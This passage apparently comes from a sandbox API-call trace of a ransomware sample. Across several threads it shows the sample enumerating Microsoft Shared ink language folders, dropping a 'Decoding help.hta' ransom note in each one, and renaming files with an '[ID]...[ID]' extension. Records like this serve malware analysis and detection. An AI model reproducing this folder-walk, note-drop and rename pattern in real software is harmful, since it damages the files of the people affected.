Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.879] FindNextFileW (in: hFindFile=0x10fbc918, lpFindFileData=0x2d46fd30 | out: lpFindFileData=0x2d46fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fe5f52, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe52213c5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5247522, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.879] FindClose (in: hFindFile=0x10fbc918 | out: hFindFile=0x10fbc918) returned 1 Thread: id = 905 os_tid = 0x940 [0055.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*", lpFindFileData=0x2d5afd30 | out: lpFindFileData=0x2d5afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db3b8 [0056.856] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.856] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x2d5afd30 | out: lpFindFileData=0x2d5afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.856] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.856] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.856] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x2d5afd30 | out: lpFindFileData=0x2d5afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42361e6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe44977b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe44977b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0056.856] lstrcpyW (in: lpString1=0x10968810, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*" [0056.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*") returned 64 [0056.856] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\Decoding help.hta" [0056.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\decoding help.hta")) returned 0xffffffff [0056.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x894 [0059.033] WriteFile (in: hFile=0x894, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d5afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d5afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.500] CloseHandle (hObject=0x894) returned 1 [0061.600] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 906 os_tid = 0x92c [0055.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*", lpFindFileData=0x2d6efd30 | out: lpFindFileData=0x2d6efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbca58 [0059.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.407] FindNextFileW (in: hFindFile=0x10fbca58, lpFindFileData=0x2d6efd30 | out: lpFindFileData=0x2d6efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.407] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.407] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.407] FindNextFileW (in: hFindFile=0x10fbca58, lpFindFileData=0x2d6efd30 | out: lpFindFileData=0x2d6efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.407] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*" [0059.407] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*") returned 64 [0059.407] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\Decoding help.hta" [0059.407] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\decoding help.hta")) returned 0xffffffff [0059.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.665] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d6efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d6efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.666] CloseHandle (hObject=0x4bc) returned 1 [0060.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.882] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.882] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.882] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*" [0060.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*") returned 64 [0060.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" [0060.882] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" [0060.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.882] FindNextFileW (in: hFindFile=0x10fbca58, lpFindFileData=0x2d6efd30 | out: lpFindFileData=0x2d6efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe59917ef, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5b809a8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5b809a8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.882] FindClose (in: hFindFile=0x10fbca58 | out: hFindFile=0x10fbca58) returned 1 Thread: id = 907 os_tid = 0x35c [0055.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*", lpFindFileData=0x2d82fd30 | out: lpFindFileData=0x2d82fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbca98 [0059.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.408] FindNextFileW (in: hFindFile=0x10fbca98, lpFindFileData=0x2d82fd30 | out: lpFindFileData=0x2d82fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.408] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.408] FindNextFileW (in: hFindFile=0x10fbca98, lpFindFileData=0x2d82fd30 | out: lpFindFileData=0x2d82fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.408] lstrcpyW (in: lpString1=0x2a7302b8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*" [0059.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*") returned 64 [0059.408] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\Decoding help.hta" [0059.408] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\decoding help.hta")) returned 0xffffffff [0059.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.666] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d82fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d82fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.667] CloseHandle (hObject=0x4bc) returned 1 [0060.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.882] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.882] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.882] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*" [0060.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*") returned 64 [0060.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" [0060.882] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" [0060.882] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.883] FindNextFileW (in: hFindFile=0x10fbca98, lpFindFileData=0x2d82fd30 | out: lpFindFileData=0x2d82fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.883] FindClose (in: hFindFile=0x10fbca98 | out: hFindFile=0x10fbca98) returned 1 Thread: id = 908 os_tid = 0x6a8 [0055.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*", lpFindFileData=0x2d96fd30 | out: lpFindFileData=0x2d96fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ab0 [0056.189] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.189] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x2d96fd30 | out: lpFindFileData=0x2d96fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.189] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.189] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.189] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x2d96fd30 | out: lpFindFileData=0x2d96fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0056.601] lstrcpyW (in: lpString1=0x2aa88f20, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*" [0056.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*") returned 64 [0056.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\Decoding help.hta" [0056.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\decoding help.hta")) returned 0xffffffff [0056.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0059.380] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2d96fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2d96fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.629] CloseHandle (hObject=0x4bc) returned 1 [0060.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.861] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.861] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.861] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*" [0060.861] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*") returned 64 [0060.861] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" [0060.862] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" [0060.862] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.864] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x2d96fd30 | out: lpFindFileData=0x2d96fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.864] FindClose (in: hFindFile=0x5a5ab0 | out: hFindFile=0x5a5ab0) returned 1 Thread: id = 909 os_tid = 0x804 [0055.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*", lpFindFileData=0x2daafd30 | out: lpFindFileData=0x2daafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db6f8 [0057.102] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.102] FindNextFileW (in: hFindFile=0x5db6f8, lpFindFileData=0x2daafd30 | out: lpFindFileData=0x2daafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.103] lstrcmpW (lpString1=".", lpString2="..") returned -1 